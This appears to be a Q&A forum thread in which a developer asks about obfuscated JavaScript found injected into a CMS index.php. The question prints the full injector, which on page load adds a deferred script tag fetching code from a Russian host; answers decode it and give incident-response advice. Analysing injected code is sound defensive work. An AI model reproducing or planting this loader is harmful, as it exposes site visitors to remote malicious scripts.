views:

221

answers:

4

I validated my client's website to xHTML Strict 1.0/CSS 2.1 standards last week. Today when I re-checked, I had a validation error caused by a weird and previous unknown script. I found this in the index.php file of my ExpressionEngine CMS. Is this a hacking attempt as I suspected? I couldn't help but notice the Russian domain encoded in the script...

What is this javascript doing? I need to explain the specific dangers to my client.




    this.v=27047;
    this.v+=187;
    ug=["n"];
    OV=29534;
    OV--;
    var y;
    var C="C";
    var T={};

    r=function(){
        b=36068;
        b-=144;
        M=[];

        function f(V,w,U){
            return V.substr(w,U);
            var wH=39640;
        }

        var L=["o"];
        var cj={};
        var qK={N:false};
        var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2);
        var BT="BT";
        var fV=RegExp;
        var CE={bf:false};
        var UW='';
        this.Ky=11592;
        this.Ky-=237;
        var VU=document;
        var _n=[];

        try {} catch(wP){};

        this.JY=29554;
        this.JY-=245;

        function s(V,w){
            l=13628;
            l--;
            var U="["+w+String("]");
            var rk=new fV(U, f("giId",0,1));
            this.NS=18321;this.NS+=195;return V.replace(rk, UW);

            try {} catch(k){};
        };

        this.jM="";
        var CT={};
        var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z');

        try {var vv='m'} catch(vv){};

        var Os={};
        var t=null;
        var e=String("bod"+"y");
        var F=155183-147103;
        this.kp='';
        Z={Ug:false};
        y=function(){
            var kl=["mF","Q","cR"];

            try {
                Bf=11271;
                Bf-=179;
                var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5');
                Fp=VU[u](A);
                var H="";

                try {} catch(WK){};

                this.Ca=19053;
                this.Ca--;
                var O=s('s5rLcI','2A5IhLo');
                var V=F+fa;
                this.bK="";
                var ya=String("de"+"fe"+f("r3bPZ",0,1));
                var bk=new String();
                pB=9522;
                pB++;
                Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V;
                Fp[ya]=[1][0];
                Pe=45847;
                Pe--;
                VU[e].appendChild(Fp);
                var lg=new Array();
                var aQ={vl:"JC"};
                this.KL="KL";
            } 
            catch(x){
                this.Ja="";
                Th=["pj","zx","kO"];
                var Jr='';
            };

            Tr={qZ:21084};
        };

        this.pL=false;
    };

    be={};
    rkE={hb:"vG"};
    r();
    var bY=new Date();
    window.onload=y;
    cU=["Yr","gv"];



+13  A: 

Yes. The site has been compromised.

What you need to do is:

  1. Ensure that everyone who had access to those passwords run an updated virusscan on computers that they may have logged into the site from.
  2. Ensure that you change all login and admin passwords.
  3. If possible you should likely revert to the codebase as it was prior to you coming across this.
  4. Check the modification time of the script where you found this snippet (if it isn't too late) and look for other files that have been changed around that time. The script is likely randomly generated so grepping for parts of it is unlikely to be conclusive.

If this script was able to find its way in, then so can others. It is not uncommon that web sites are compromised via keylogging trojans on the computers of those who log into them.
See http://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activity

unomi
Thanks for the tips. The only files modified around that time were the index.php file for expression engine and two old index.htm files that were used for a previous design of the site. Apparently, they target index files? I'll pass these suggestions on and hopeful prevent disaster before it's too late!
Julian
My most recent update was <script type="text/javascript"> $(document).ready(function() { document.title = 'New Title'; });</script>Do you think this might something to do with it?
Julian
No, in order for the script to have been embedded in the manner that it was, the server itself had to have been compromised. Either they found an exploit to gain write access on the server or they were able to get login credentials either thru weak passwords, dumb luck or trojans.
unomi
+4  A: 

The script basically adds the following line to your closing body tag:

<script defer="defer" src="http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php"&gt;&lt;/script&gt;

So, its trying to load an external script onto your site. I'm not sure what this script does - but no doubt its not anything nice.

Additionally, a quick search of "towersky.ru" on google reveals lists of malicious websites containing this site.

I think the guys at towersky.ru might be on a very noble mission here. The included script is named "speedtest.net.php", so maybe they are just trying to inject this script in all web pages around the world and if you're site is running slow, they'll just call up and inform you about it.
Anurag
That's fair enough, but have you really got proof of that. Besides, if somebody injected code like that onto my site, clearly without permission, I wouldn't be too happy. Also why was such an effort made to mask what the script does? The use of "google.com" and "depositfiles.com" makes it even more suspicious - it tries to make it appear as if the code is from Google.
+8  A: 

The above code writes some code which activates code on the Russian site (http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php), which adds an invisible DIV containing an iFrame, which I assume contains a picture of a puppy.

Seth
You are correct fine sir. Puppies.
Thqr
+1  A: 

Considering I couldn't even load this page in Windows because my AV stopped me, yes, its a virus.

TheLQ